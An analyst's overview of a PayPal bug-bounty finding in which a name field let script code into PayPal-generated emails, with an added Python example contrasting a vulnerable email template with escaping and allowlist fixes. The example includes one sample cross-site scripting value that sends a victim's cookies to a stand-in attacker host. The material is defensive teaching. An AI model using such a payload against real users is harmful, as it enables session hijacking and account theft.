Offering bounties for finding and reporting exploitable flaws in code continues to pay dividends for financial institutions and, increasingly, for financial technology companies. The article recounts a recent example involving payment service provider PayPal.
The flaw allowed a holder of an ordinary PayPal account to deliver malicious code to other users through PayPal's own emails. Sending a message to another PayPal user requires filling in a name, usually a first and last name, but it turned out that the field accepted arbitrary input, including script code, so the email PayPal generated carried whatever had been typed there, malicious scripts included.
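As an added illustration, not code from PayPal or from the article, the snippet below shows the general shape of this class of flaw: a name field interpolated into an HTML notification email without validation or escaping, next to the two fixes a reviewer would ask for, an input allowlist and output escaping. The function names, the template and the sample inputs are constructed for this example and are assumptions, not anything taken from PayPal's system.

```python
"""Added example (not PayPal's or the article's code): an unvalidated name
field rendered into an HTML email, and the input- and output-side fixes."""
import html
import re

# Constructed sample inputs for this example (not from the article).
SAFE_NAME = "Ann O'Malley-Smith"
HOSTILE_NAME = "<script>location='https://evil.example/?c='+document.cookie</script>"

# Hypothetical notification template; a real provider's template would differ.
TEMPLATE = "<p>{name} has sent you a payment of {amount}.</p>"


def render_notice_vulnerable(name: str, amount: str) -> str:
    """Bug pattern: the user-supplied name is dropped into HTML verbatim,
    so markup and script typed into the field become part of the email body."""
    return TEMPLATE.format(name=name, amount=amount)


def render_notice_hardened(name: str, amount: str) -> str:
    """Output-side fix: escape every user-controlled value at the point it
    enters an HTML context, so '<' and quotes can never open a tag."""
    return TEMPLATE.format(
        name=html.escape(name, quote=True),
        amount=html.escape(amount, quote=True),
    )


def is_valid_name(name: str) -> bool:
    """Input-side fix: an allowlist for what a person's name may contain.
    Unicode letters, spaces, dots, apostrophes and hyphens, 1 to 80 characters,
    starting with a letter. Angle brackets, quotes and '=' are rejected."""
    if not 1 <= len(name) <= 80 or not name[0].isalpha():
        return False
    return all(ch.isalpha() or ch in " .'-" for ch in name)


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def carries_script(rendered: str) -> bool:
    """Does the rendered email body contain a live <script ...> tag
    (as opposed to the inert, escaped text '&lt;script')?"""
    return SCRIPT_TAG.search(rendered) is not None


def process_request(name: str, amount: str):
    """Defence in depth: refuse bad input up front and escape anyway.
    Returns the rendered email body, or None when the name is refused."""
    if not is_valid_name(name):
        return None
    return render_notice_hardened(name, amount)


if __name__ == "__main__":
    print("vulnerable:", render_notice_vulnerable(HOSTILE_NAME, "$5.00"))
    print("hardened:  ", render_notice_hardened(HOSTILE_NAME, "$5.00"))
    print("allowlist: ", is_valid_name(SAFE_NAME), is_valid_name(HOSTILE_NAME))
```

The two fixes are deliberately independent: escaping at output protects every template that renders the field, while the allowlist stops hostile input from ever reaching storage, logs or other channels where a later developer might forget to escape it.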
In relating the finding and the subsequent report of the flawed code, the author shows that even well-known payment systems are subject to attack from “blackhats”, and that the efforts of “whitehats” are identifying holes in the defenses. The author then makes a leap, however, concluding that the flaws in PayPal’s email confirmation system demonstrate the inferiority of a centralized record-keeping system to a distributed ledger such as Bitcoin.
While the redundant verification built into the Bitcoin blockchain does guard against rewriting the ledger, and thereby secures the record of who owns which bitcoin, the communication channels of Bitcoin wallet providers gain no additional security from participating in the blockchain. A wallet provider's confirmation emails are ordinary web application output, and are open to the same class of input-handling flaw found at PayPal.
Mercator Advisory Group recognizes the particular strengths that Bitcoin blockchain affords, but impervious email messaging cannot be counted as one.
Overview by Joseph Walent, Senior Analyst, Emerging Technology Advisory Service at Mercator Advisory Group